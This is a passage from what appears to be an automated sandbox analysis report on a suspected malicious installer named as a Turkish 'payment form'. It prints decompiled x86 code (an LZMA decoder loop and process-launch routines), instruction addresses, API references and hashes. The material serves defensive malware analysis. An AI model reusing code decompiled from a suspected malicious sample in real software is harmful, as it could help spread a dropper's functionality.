											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00000000
0x0040638c
0x0040638c
0x00406390
0x004063b9
0x004063c3
0x00406392
0x0040639b
0x004063a8
0x004063ab
0x004066ef
0x004066ef
0x004066f2
0x004066f2
0x004066f2
0x004066f8
0x004066fe
0x00406704
0x0040671e
0x00406721
0x00406727
0x00406732
0x00406734
0x00406706
0x00406706
0x00406715
0x00406719
0x00406719
0x0040673e
0x00000000
0x00000000
0x00406740
0x00406744
0x004068f3
0x00406909
0x00406911
0x00406918
0x0040691a
0x00406921
0x00406925
0x00406925
0x00406750
0x00406757
0x0040675f
0x00406762
0x00406765
0x00406765
0x0040676b
0x0040676b
0x00405f07
0x00405f07
0x00405f07
0x00405f10
0x00000000
0x00000000
0x00405f16
0x00000000
0x00405f21
0x00000000
0x00000000
0x00405f2a
0x00405f2d
0x00405f30
0x00405f34
0x00000000
0x00000000
0x00405f3a
0x00405f3d
0x00405f3f
0x00405f40
0x00405f43
0x00405f45
0x00405f46
0x00405f48
0x00405f4b
0x00405f50
0x00405f55
0x00405f5e
0x00405f71
0x00405f74
0x00405f80
0x00405fa8
0x00405faa
0x00405fb8
0x00405fb8
0x00405fbc
0x00000000
0x00000000
0x00000000
0x00000000
0x00405fac
0x00405fac
0x00405faf
0x00405fb0
0x00405fb0
0x00000000
0x00405fac
0x00405f86
0x00405f8b
0x00405f8b
0x00405f94
0x00405f9c
0x00405f9f
0x00000000
0x00405fa5
0x00405fa5
0x00000000
0x00405fa5
0x00000000
0x00405fc2
0x00405fc2
0x00405fc6
0x00406872
0x00000000
0x00406872
0x00405fcf
0x00405fdf
0x00405fe2
0x00405fe5
0x00405fe5
0x00405fe5
0x00405fe8
0x00405fec
0x00000000
0x00000000
0x00405fee
0x00405ff4
0x0040601e
0x00406024
0x0040602b
0x00000000
0x0040602b
0x00405ffa
0x00405ffd
0x00406002
0x00406002
0x0040600d
0x00406015
0x00406018
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040605d
0x00406063
0x00406066
0x00406073
0x0040607b
0x004066ef
0x00000000
0x00000000
0x00406032
0x00406032
0x00406036
0x00406881
0x00000000
0x00406881
0x00406042
0x0040604d
0x0040604d
0x0040604d
0x00406050
0x00406053
0x00406056
0x0040605b
0x00000000
0x00000000
0x00000000
0x00000000
0x004066f2
0x004066f2
0x004066f8
0x004066fe
0x00406704
0x0040671e
0x00406721
0x00406727
0x00406732
0x00406734
0x00406706
0x00406706
0x00406715
0x00406719
0x00406719
0x0040673e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406083
0x00406085
0x00406088
0x004060f9
0x004060fc
0x004060ff
0x00406106
0x00406110
0x004066ef
0x004066ef
0x00000000
0x004066ef
0x004066ef
0x0040608a
0x0040608e
0x00406091
0x00406093
0x00406096
0x00406099
0x0040609b
0x0040609e
0x004060a0
0x004060a5
0x004060a8
0x004060ab
0x004060af
0x004060b6
0x004060b9
0x004060c0
0x004060c4
0x004060cc
0x004060cc
0x004060cc
0x004060c6
0x004060c6
0x004060c6
0x004060bb
0x004060bb
0x004060bb
0x004060d0
0x004060d3
0x004060f1
0x004060f3
0x00000000
0x004060d5
0x004060d5
0x004060d8
0x004060db
0x004060de
0x004060e0
0x004060e0
0x004060e0
0x004060e3
0x004060e6
0x004060e8
0x004060e9
0x004060ec
0x00000000
0x004060ec
0x00000000
0x00406322
0x00406326
0x00406344
0x00406347
0x0040634e
0x00406351
0x00406354
0x00406357
0x0040635a
0x0040635d
0x0040635f
0x00406366
0x00406367
0x00406369
0x0040636c
0x0040636f
0x00406372
0x00406372
0x00406377
0x00000000
0x00406377
0x00406328
0x0040632b
0x0040632e
0x00406338
0x004066ef
0x004066ef
0x00000000
0x004066ef
0x00000000
0x00000000
0x00000000
0x004063cf
0x004063d3
0x00000000
0x00000000
0x004063d9
0x004063dd
0x00000000
0x00000000
0x004063e3
0x004063e5
0x004063e9
0x004063e9
0x004063ec
0x004063f0
0x00000000
0x00000000
0x00406440
0x00406444
0x0040644b
0x0040644e
0x00406451
0x0040645b
0x004066ef
0x004066ef
0x00000000
0x004066ef
0x004066ef
0x00406446
0x00000000
0x00000000
0x00406467
0x0040646b
0x00406472
0x00406475
0x00406478
0x0040646d
0x0040646d
0x0040646d
0x0040647b
0x0040647e
0x00406481
0x00406481
0x00406484
0x00406487
0x0040648a
0x0040648a
0x0040648d
0x00406494
0x00406499
0x00000000
0x00000000
0x00406527
0x00406527
0x0040652b
0x004068c9
0x00000000
0x004068c9
0x00406531
0x00406534
0x00406537
0x0040653b
0x0040653e
0x00406544
0x00406546
0x00406546
0x00406546
0x00406549
0x0040654c
0x00000000
0x00000000
0x0040611c
0x0040611c
0x00406120
0x0040688d
0x00000000
0x0040688d
0x00406126
0x00406129
0x0040612c
0x00406130
0x00406133
0x00406139
0x0040613b
0x0040613b
0x0040613b
0x0040613e
0x00406141
0x00406141
0x00406144
0x00406147
0x00000000
0x00000000
0x0040614d
0x00406153
0x00000000
0x00000000
0x00406159
0x00406159
0x0040615d
0x00406160
0x00406163
0x00406166
0x00406169
0x0040616a
0x0040616d
0x0040616f
0x00406175
0x00406178
0x0040617b
0x0040617e
0x00406181
0x00406184
0x00406187
0x004061a3
0x004061a6
0x004061a9
0x004061ac
0x004061b3
0x004061b7
0x004061b9
0x004061bd
0x00406189
0x00406189
0x0040618d
0x00406195
0x0040619a
0x0040619c
0x0040619e
0x0040619e
0x004061c0
0x004061c7
0x004061ca
0x00000000
0x004061d0
0x00000000
0x004061d0
0x00000000
0x004061d5
0x004061d5
0x004061d9
0x00406899
0x00000000
0x00406899
0x004061df
0x004061e2
0x004061e5
0x004061e9
0x004061ec
0x004061f2
0x004061f4
0x004061f4
0x004061f4
0x004061f7
0x004061fa
0x004061fa
0x004061fa
0x00406200
0x00000000
0x00000000
0x00406202
0x00406205
0x00406208
0x0040620b
0x0040620e
0x00406211
0x00406214
0x00406217
0x0040621a
0x0040621d
0x00406220
0x00406238
0x0040623b
0x0040623e
0x00406241
0x00406241
0x00406244
0x00406248
0x0040624a
0x00406222
0x00406222
0x0040622a
0x0040622f
0x00406231
0x00406233
0x00406233
0x0040624d
0x00406254
0x00406257
0x00000000
0x00406259
0x00000000
0x00406259
0x00406257
0x0040625e
0x0040625e
0x0040625e
0x0040625e
0x00000000
0x00000000
0x00406299
0x00406299
0x0040629d
0x004068a5
0x00000000
0x004068a5
0x004062a3
0x004062a6
0x004062a9
0x004062ad
0x004062b0
0x004062b6
0x004062b8
0x004062b8
0x004062b8
0x004062bb
0x004062be
0x004062be
0x004062c4
0x00406262
0x00406262
0x00406265
0x00000000
0x00406265
0x004062c6
0x004062c6
0x004062c9
0x004062cc
0x004062cf
0x004062d2
0x004062d5
0x004062d8
0x004062db
0x004062de
0x004062e1
0x004062e4
0x004062fc
0x004062ff
0x00406302
0x00406305
0x00406305
0x00406308
0x0040630c
0x0040630e
0x004062e6
0x004062e6
0x004062ee
0x004062f3
0x004062f5
0x004062f7
0x004062f7
0x00406311
0x00406318
0x0040631b
0x00000000
0x0040631d
0x00000000
0x0040631d
0x00000000
0x004065aa
0x004065aa
0x004065ae
0x004068d5
0x00000000
0x004068d5
0x004065b4
0x004065b7
0x004065ba
0x004065be
0x004065c1
0x004065c7
0x004065c9
0x004065c9
0x004065c9
0x004065cc
0x00000000
0x00000000
0x0040637a
0x0040637a
0x0040637d
0x004066ef
0x004066ef
0x00000000
0x004066ef
0x00000000
0x004066b9
0x004066bd
0x004066df
0x004066e2
0x004066ec
0x004066ef
0x004066ef
0x00000000
0x004066ef
0x004066ef
0x004066bf
0x004066c2
0x004066c6
0x004066c9
0x004066c9
0x004066cc
0x00000000
0x00000000
0x00406776
0x0040677a
0x00406798
0x00406798
0x00406798
0x0040679f
0x004067a6
0x004067ad
0x004067ad
0x00000000
0x004067ad
0x0040677c
0x0040677f
0x00406782
0x00406785
0x0040678c
0x004066d0
0x004066d0
0x004066d3
0x00000000
0x00000000
0x00406867
0x0040686a
0x0040676b
0x00000000
0x00000000
0x004064a1
0x004064a3
0x004064aa
0x004064ab
0x004064ad
0x004064b0
0x00000000
0x00000000
0x004064b8
0x004064bb
0x004064be
0x004064c0
0x004064c2
0x004064c2
0x004064c3
0x004064c6
0x004064cd
0x004064d0
0x004064de
0x00000000
0x00000000
0x004067b4
0x004067b4
0x004067b7
0x004067be
0x00000000
0x00000000
0x004067c3
0x004067c3
0x004067c7
0x004068ff
0x00000000
0x004068ff
0x004067cd
0x004067d0
0x004067d3
0x004067d7
0x004067da
0x004067e0
0x004067e2
0x004067e2
0x004067e2
0x004067e5
0x004067e8
0x004067e8
0x004067e8
0x004067e8
0x004067eb
0x004067eb
0x004067ef
0x0040684f
0x00406852
0x00406857
0x00406858
0x0040685a
0x0040685c
0x0040685f
0x0040676b
0x0040676b
0x00000000
0x00406771
0x0040676b
0x004067f1
0x004067f7
0x004067fa
0x004067fd
0x00406800
0x00406803
0x00406806
0x00406809
0x0040680c
0x0040680f
0x00406812
0x0040682b
0x0040682e
0x00406831
0x00406834
0x00406838
0x0040683a
0x0040683a
0x0040683b
0x0040683e
0x00406814
0x00406814
0x0040681c
0x00406821
0x00406823
0x00406826
0x00406826
0x00406841
0x00406848
0x00000000
0x0040684a
0x00000000
0x0040684a
0x00000000
0x004064e6
0x004064e9
0x0040651f
0x0040664f
0x0040664f
0x0040664f
0x0040664f
0x00406652
0x00406652
0x00406655
0x00406657
0x004068e1
0x00000000
0x004068e1
0x0040665d
0x00406660
0x00000000
0x00000000
0x00406666
0x0040666a
0x0040666d
0x0040666d
0x0040666d
0x00000000
0x0040666d
0x004064eb
0x004064ed
0x004064ef
0x004064f1
0x004064f4
0x004064f5
0x004064f7
0x004064f9
0x004064fc
0x004064ff
0x00406515
0x0040651a
0x00406552
0x00406552
0x00406556
0x00406582
0x00406584
0x0040658b
0x0040658e
0x00406591
0x00406591
0x00406596
0x00406596
0x00406598
0x0040659b
0x004065a2
0x004065a5
0x004065d2
0x004065d2
0x004065d5
0x004065d8
0x0040664c
0x0040664c
0x0040664c
0x00000000
0x0040664c
0x004065da
0x004065e0
0x004065e3
0x004065e6
0x004065e9
0x004065ec
0x004065ef
0x004065f2
0x004065f5
0x004065f8
0x004065fb
0x00406614
0x00406616
0x00406619
0x0040661a
0x0040661d
0x0040661f
0x00406622
0x00406624
0x00406626
0x00406629
0x0040662b
0x0040662e
0x00406632
0x00406634
0x00406634
0x00406635
0x00406638
0x0040663b
0x004065fd
0x004065fd
0x00406605
0x0040660a
0x0040660c
0x0040660f
0x0040660f
0x0040663e
0x00406645
0x004065cf
0x004065cf
0x004065cf
0x004065cf
0x00000000
0x00406647
0x00000000
0x00406647
0x00406645
0x00406558
0x0040655b
0x0040655d
0x00406560
0x00406563
0x00406566
0x00406568
0x0040656b
0x0040656e
0x0040656e
0x00406571
0x00406571
0x00406574
0x0040657b
0x0040654f
0x0040654f
0x0040654f
0x0040654f
0x00000000
0x0040657d
0x00000000
0x0040657d
0x0040657b
0x00406501
0x00406504
0x00406506
0x00406509
0x00000000
0x00000000
0x00406268
0x00406268
0x0040626c
0x004068b1
0x00000000
0x004068b1
0x00406272
0x00406275
0x00406278
0x0040627b
0x0040627e
0x00406281
0x00406284
0x00406286
0x00406289
0x0040628c
0x0040628f
0x00406291
0x00406291
0x00406291
0x00000000
0x00000000
0x004063f3
0x004063f3
0x004063f7
0x004068bd
0x00000000
0x004068bd
0x004063fd
0x00406400
0x00406403
0x00406406
0x00406408
0x00406408
0x00406408
0x0040640b
0x0040640e
0x00406411
0x00406414
0x00406417
0x0040641a
0x0040641b
0x0040641d
0x0040641d
0x0040641d
0x00406420
0x00406423
0x00406426
0x00406429
0x00406429
0x00406429
0x0040642c
0x0040642e
0x0040642e
0x00000000
0x00000000
0x00406670
0x00406670
0x00406670
0x00406674
0x00000000
0x00000000
0x0040667a
0x0040667d
0x00406680
0x00406683
0x00406685
0x00406685
0x00406685
0x00406688
0x0040668b
0x0040668e
0x00406691
0x00406694
0x00406697
0x00406698
0x0040669a
0x0040669a
0x0040669a
0x0040669d
0x004066a0
0x004066a3
0x004066a6
0x004066a9
0x004066ad
0x004066af
0x004066b2
0x00000000
0x004066b4
0x00406431
0x00406431
0x00000000
0x00406431
0x004066b2
0x004068e7
0x00000000
0x00000000
0x00405f16
0x0040691e
0x0040691e
0x00000000
0x0040691e
0x0040676b
0x004066f2
0x004066ef

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 777e71cebdbf5760ca8733070a207fa71ebe7e60942d27e02112710a77df43e6
Instruction ID: eed9497ed027258a65708919b4ea66700c8fb804c6c24b7440c20fb41b46c6b0
Opcode Fuzzy Hash: 777e71cebdbf5760ca8733070a207fa71ebe7e60942d27e02112710a77df43e6
Instruction Fuzzy Hash: 57715671D00229CFEF28CF98C844BADBBB1FB44305F15806AD856BB281D7789A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00401E76 Relevance: 4.5, APIs: 3, Instructions: 48
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00401E76() {
				void* _t15;
				void* _t24;
				void* _t26;
				void* _t31;

				_t28 = E00402A85(_t24);
				E00404E9F(0xffffffeb, _t13);
				_t15 = E00405361(_t28); // executed
				 *(_t31 + 8) = _t15;
				if(_t15 == _t24) {
					 *((intOrPtr*)(_t31 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t31 - 0x1c)) != _t24) {
						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
							E00405E13(0xf);
						}
						GetExitCodeProcess( *(_t31 + 8), _t31 - 0x3c); // executed
						if( *((intOrPtr*)(_t31 - 0x20)) < _t24) {
							if( *(_t31 - 0x3c) != _t24) {
								 *((intOrPtr*)(_t31 - 4)) = 1;
							}
						} else {
							E00405A52(_t26,  *(_t31 - 0x3c));
						}
					}
					_push( *(_t31 + 8));
					CloseHandle();
				}
				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t31 - 4));
				return 0;
			}

0x00401e7c
0x00401e81
0x00401e87
0x00401e8e
0x00401e91
0x004026bf
0x00401e97
0x00401e9a
0x00401eab
0x00401ea6
0x00401ea6
0x00401ec0
0x00401ec9
0x00401ed9
0x00401edb
0x00401edb
0x00401ecb
0x00401ecf
0x00401ecf
0x00401ec9
0x00401ee2
0x00401ee5
0x00401ee5
0x0040291d
0x00402929

APIs

Part of subcall function 00404E9F: lstrlenA.KERNEL32(0041FD08,?,00000000,?,?,?,?,?,?,?,?,?,?,?,004055E1,000000E5), ref: 00404ED8
Part of subcall function 00404E9F: lstrlenA.KERNEL32(?,0041FD08,?,00000000,?,?,?,?,?,?,?,?,?,?,?,004055E1), ref: 00404EE8
Part of subcall function 00404E9F: lstrcatA.KERNEL32(0041FD08,?,?,0041FD08,?,00000000,?), ref: 00404EFB
Part of subcall function 00404E9F: SetWindowTextA.USER32(0041FD08,0041FD08), ref: 00404F0D
Part of subcall function 00404E9F: SendMessageA.USER32(000000E5,00001004,00000000,00000000), ref: 00404F33
Part of subcall function 00404E9F: SendMessageA.USER32(000000E5,00001007,00000000,00000001), ref: 00404F4D
Part of subcall function 00404E9F: SendMessageA.USER32(000000E5,00001013,?,00000000), ref: 00404F5B

Part of subcall function 00405361: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422538,Error launching installer), ref: 00405386
Part of subcall function 00405361: CloseHandle.KERNEL32(?), ref: 00405393

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401EB0
GetExitCodeProcess.KERNELBASE ref: 00401EC0
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EE5

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
String ID:
API String ID: 3521207402-0
Opcode ID: 63ea715109260620e1cc643b3b38af3e1470e562ac9841a4740e8934b88e8816
Instruction ID: 7da7f48acba4dd0e4cefddd12cfcc923695080b3e0b12fbb56f2b87fe8ee5a54
Opcode Fuzzy Hash: 63ea715109260620e1cc643b3b38af3e1470e562ac9841a4740e8934b88e8816
Instruction Fuzzy Hash: D9012D31D04105EBCB21AFA5DD85A9E7AB5EF40344F14803BFA05B61E1C7BD4A41DF9A

Uniqueness

Uniqueness Score: -1.00%

Function 00403664 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403664() {
				void* _t1;
				void* _t2;
				void* _t3;
				void* _t6;
				signed int _t11;

				_t1 =  *0x409020; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x409020 =  *0x409020 | 0xffffffff;
				}
				_t2 =  *0x409024; // 0xffffffff
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x409024 =  *0x409024 | 0xffffffff;
					_t11 =  *0x409024;
				}
				_t3 = E00405426(_t6, _t11, "C:\\Users\\hardz\\AppData\\Local\\Temp\\nsz96AF.tmp\\", 7); // executed
				return _t3;
			}

0x00403664
0x00403673
0x00403676
0x00403678
0x00403678
0x0040367f
0x00403687
0x0040368a
0x0040368c
0x0040368c
0x0040368c
0x0040369a
0x004036a0

APIs

CloseHandle.KERNEL32(FFFFFFFF,00000000,004034D4,00000000), ref: 00403676
CloseHandle.KERNEL32(FFFFFFFF,00000000,004034D4,00000000), ref: 0040368A

Strings

C:\Users\user\AppData\Local\Temp\nsz96AF.tmp\, xrefs: 00403695

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: CloseHandle
String ID: C:\Users\user\AppData\Local\Temp\nsz96AF.tmp\
API String ID: 2962429428-3789901117
Opcode ID: 16c7fddc27a42458c1d873a3e0a24777e1257085425b1f33580ea887bd94cc5b
